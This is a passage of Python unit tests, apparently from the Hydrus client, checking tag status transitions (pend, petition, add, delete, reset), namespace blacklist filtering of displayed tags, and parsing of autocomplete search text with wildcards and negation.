self.assertEqual( self._tags_manager.GetPending( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._tags_manager.GetPending( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'pending' } )
self.assertEqual( self._tags_manager.GetPending( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ), { 'pending' } )
def test_get_petitioned( self ):
self.assertEqual( self._tags_manager.GetPetitioned( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._tags_manager.GetPetitioned( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'petitioned' } )
self.assertEqual( self._tags_manager.GetPetitioned( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._tags_manager.GetPetitioned( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ), { 'petitioned' } )
def test_get_service_keys_to_statuses_to_tags( self ):
s = self._tags_manager.GetServiceKeysToStatusesToTags( ClientTags.TAG_DISPLAY_STORAGE )
self.assertEqual( s[ self._first_key ], self._service_keys_to_statuses_to_tags[ self._first_key ] )
self.assertEqual( s[ self._second_key ], self._service_keys_to_statuses_to_tags[ self._second_key ] )
self.assertEqual( s[ self._third_key ], self._service_keys_to_statuses_to_tags[ self._third_key ] )
def test_get_statuses_to_tags( self ):
self.assertEqual( self._tags_manager.GetStatusesToTags( self._first_key, ClientTags.TAG_DISPLAY_STORAGE ), self._service_keys_to_statuses_to_tags[ self._first_key ] )
self.assertEqual( self._tags_manager.GetStatusesToTags( self._second_key, ClientTags.TAG_DISPLAY_STORAGE ), self._service_keys_to_statuses_to_tags[ self._second_key ] )
self.assertEqual( self._tags_manager.GetStatusesToTags( self._third_key, ClientTags.TAG_DISPLAY_STORAGE ), self._service_keys_to_statuses_to_tags[ self._third_key ] )
def test_has_tag( self ):
self.assertTrue( self._tags_manager.HasTag( '\u2835', ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertFalse( self._tags_manager.HasTag( 'not_exist', ClientTags.TAG_DISPLAY_STORAGE ) )
def test_process_content_update( self ):
hashes = { HydrusData.GenerateKey() for i in range( 6 ) }
#
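# The content update service starts with no 'hello' mapping in any status.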
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
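# DELETE on a tag that was never current should simply record it as deleted.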
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_DELETE, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
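# PEND adds the tag to pending while leaving the deleted record in place.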
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_PEND, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
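# RESCIND_PEND removes the pending record again.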
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_RESCIND_PEND, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
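# Pend the tag once more so the following ADD is tested from a pending state.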
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_PEND, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
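# ADD makes the tag current and clears the deleted and pending records.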
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_ADD, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
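# PETITION records the tag as petitioned while it stays current.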
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_PETITION, ( 'hello', hashes ), reason = 'reason' )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
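# RESCIND_PETITION clears the petition but keeps the tag current.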
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_RESCIND_PETITION, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
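# Petition the tag again so the final DELETE starts from a petitioned state.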
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_PETITION, ( 'hello', hashes ), reason = 'reason' )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
#
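# DELETE removes the current record, clears the petition and marks the tag deleted.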
content_update = HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, HC.CONTENT_UPDATE_DELETE, ( 'hello', hashes ) )
self._other_tags_manager.ProcessContentUpdate( self._content_update_service_key, content_update )
self.assertEqual( self._other_tags_manager.GetCurrent( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'hello' } )
self.assertEqual( self._other_tags_manager.GetPending( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._content_update_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertNotIn( 'hello', self._other_tags_manager.GetCurrent( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
self.assertNotIn( 'hello', self._other_tags_manager.GetPending( CC.COMBINED_TAG_SERVICE_KEY, ClientTags.TAG_DISPLAY_STORAGE ) )
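# ResetService should wipe every status for the reset service.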
def test_reset_service( self ):
self.assertEqual( self._other_tags_manager.GetCurrent( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'reset_current' } )
self.assertEqual( self._other_tags_manager.GetDeleted( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'reset_deleted' } )
self.assertEqual( self._other_tags_manager.GetPending( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'reset_pending' } )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), { 'reset_petitioned' } )
self._other_tags_manager.ResetService( self._reset_service_key )
self.assertEqual( self._other_tags_manager.GetCurrent( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetDeleted( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPending( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
self.assertEqual( self._other_tags_manager.GetPetitioned( self._reset_service_key, ClientTags.TAG_DISPLAY_STORAGE ), set() )
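# TestTagDisplayManager verifies that a 'page:' blacklist applied to the selection-list
# context filters tags there while the storage context is left untouched.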
class TestTagDisplayManager( unittest.TestCase ):
def test_tag_filtering( self ):
filter_pages = HydrusTags.TagFilter()
filter_pages.SetRule( 'page:', HC.FILTER_BLACKLIST )
tag_display_manager = ClientTagsHandling.TagDisplayManager()
tag_display_manager.SetTagFilter( ClientTags.TAG_DISPLAY_SELECTION_LIST, CC.COMBINED_TAG_SERVICE_KEY, filter_pages )
tags = { 'character:samus aran', 'series:metroid', 'page:17' }
#
self.assertFalse( tag_display_manager.FiltersTags( ClientTags.TAG_DISPLAY_STORAGE, CC.COMBINED_TAG_SERVICE_KEY ) )
storage_tags = tag_display_manager.FilterTags( ClientTags.TAG_DISPLAY_STORAGE, CC.COMBINED_TAG_SERVICE_KEY, tags )
self.assertEqual( storage_tags, tags )
#
self.assertTrue( tag_display_manager.FiltersTags( ClientTags.TAG_DISPLAY_SELECTION_LIST, CC.COMBINED_TAG_SERVICE_KEY ) )
selection_tags = tag_display_manager.FilterTags( ClientTags.TAG_DISPLAY_SELECTION_LIST, CC.COMBINED_TAG_SERVICE_KEY, tags )
self.assertTrue( len( selection_tags ) < len( tags ) )
self.assertEqual( selection_tags, filter_pages.Filter( tags ) )
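# TestTagObjects exercises ParsedAutocompleteText parsing and the predicate results
# caches under different TagAutocompleteOptions.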
class TestTagObjects( unittest.TestCase ):
def test_parsed_autocomplete_text( self ):
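# The expected values lists map, in order, to: IsAcceptableForFileSearches,
# IsAcceptableForTagSearches, IsEmpty, IsExplicitWildcard, IsNamespaceSearch,
# IsTagSearch and the inclusive flag.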
def bool_tests( pat: ClientSearch.ParsedAutocompleteText, values ):
self.assertEqual( pat.IsAcceptableForFileSearches(), values[0] )
self.assertEqual( pat.IsAcceptableForTagSearches(), values[1] )
self.assertEqual( pat.IsEmpty(), values[2] )
self.assertEqual( pat.IsExplicitWildcard(), values[3] )
self.assertEqual( pat.IsNamespaceSearch(), values[4] )
self.assertEqual( pat.IsTagSearch(), values[5] )
self.assertEqual( pat.inclusive, values[6] )
def search_text_tests( pat: ClientSearch.ParsedAutocompleteText, values ):
self.assertEqual( pat.GetSearchText( False ), values[0] )
self.assertEqual( pat.GetSearchText( True ), values[1] )
def read_predicate_tests( pat: ClientSearch.ParsedAutocompleteText, values ):
self.assertEqual( pat.GetImmediateFileSearchPredicate(), values[0] )
self.assertEqual( pat.GetNonTagFileSearchPredicates(), values[1] )
def write_predicate_tests( pat: ClientSearch.ParsedAutocompleteText, values ):
self.assertEqual( pat.GetAddTagPredicate(), values[0] )
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ '', '' ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
search_text_tests( parsed_autocomplete_text, [ '', '' ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' ), [] ] )
write_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' ) ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, False ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus', inclusive = False ), [] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus*', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'samus*' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'samus*' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'character:samus ', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'character:samus', 'character:samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus' ), [] ] )
write_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus' ) ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-character:samus ', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, False ] )
search_text_tests( parsed_autocomplete_text, [ 'character:samus', 'character:samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'character:samus', inclusive = False ), [] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 's*s', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ 's*s', 's*s*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s*' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s*' ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-s*s', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, False ] )
search_text_tests( parsed_autocomplete_text, [ 's*s', 's*s*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s*', inclusive = False ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s*', inclusive = False ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s', inclusive = False ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'metroid:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, False, True, False, True ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'metroid' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'metroid' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-metroid:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, False, True, False, False ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'metroid', inclusive = False ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'metroid', inclusive = False ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 's*s a*n', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ 's*s a*n', 's*s a*n*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s a*n*' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s a*n*' ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 's*s a*n' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( ' samus ', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' ), [] ] )
write_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, 'samus' ) ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '[samus]', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, '[samus]' ), [] ] )
write_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_TAG, '[samus]' ) ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'creator-id:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, False, True, False, True ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'creator-id' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'creator-id' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'creator-id:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, False, False, True, True, False, True ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'creator-id' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_NAMESPACE, 'creator-id' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'n*n g*s e*n:as*ka', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, False, False, True ] )
search_text_tests( parsed_autocomplete_text, [ 'n*n g*s e*n:as*ka', 'n*n g*s e*n:as*ka*' ] )
read_predicate_tests( parsed_autocomplete_text, [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'n*n g*s e*n:as*ka*' ), [ ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'n*n g*s e*n:as*ka*' ), ClientSearch.Predicate( ClientSearch.PREDICATE_TYPE_WILDCARD, 'n*n g*s e*n:as*ka' ) ] ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'system:samus ', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
search_text_tests( parsed_autocomplete_text, [ 'samus', 'samus*' ] )
#
#
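# Same inputs with search_namespaces_into_full_tags enabled: bare namespaces such as
# 'series:' become acceptable tag searches.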
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = True
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, True, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, True, False, True ] )
#
#
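# Same inputs with namespace_bare_fetch_all_allowed enabled: 'series:' is again an
# acceptable tag search.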
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = True
namespace_fetch_all_allowed = False
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
search_namespaces_into_full_tags,
namespace_bare_fetch_all_allowed,
namespace_fetch_all_allowed,
fetch_all_allowed
)
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, True, False, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '-', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, False, False, False, False ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'samus', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, False, True, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( '*:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ False, False, False, True, False, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, False, True, False, True ] )
#
parsed_autocomplete_text = ClientSearch.ParsedAutocompleteText( 'series:*', tag_autocomplete_options, True )
bool_tests( parsed_autocomplete_text, [ True, True, False, True, True, False, True ] )
#
#
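# With only namespace_fetch_all_allowed enabled, bare 'series:' is not an acceptable
# tag search but the explicit 'series:*' is.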
tag_autocomplete_options = ClientTagsHandling.TagAutocompleteOptions( CC.COMBINED_TAG_SERVICE_KEY )
search_namespaces_into_full_tags = False
namespace_bare_fetch_all_allowed = False
namespace_fetch_all_allowed = True
fetch_all_allowed = False
tag_autocomplete_options.SetTuple(
tag_autocomplete_options.GetWriteAutocompleteTagDomain(),
tag_autocomplete_options.OverridesWriteAutocompleteFileDomain(),
tag_autocomplete_options.GetWriteAutocompleteFileDomain(),
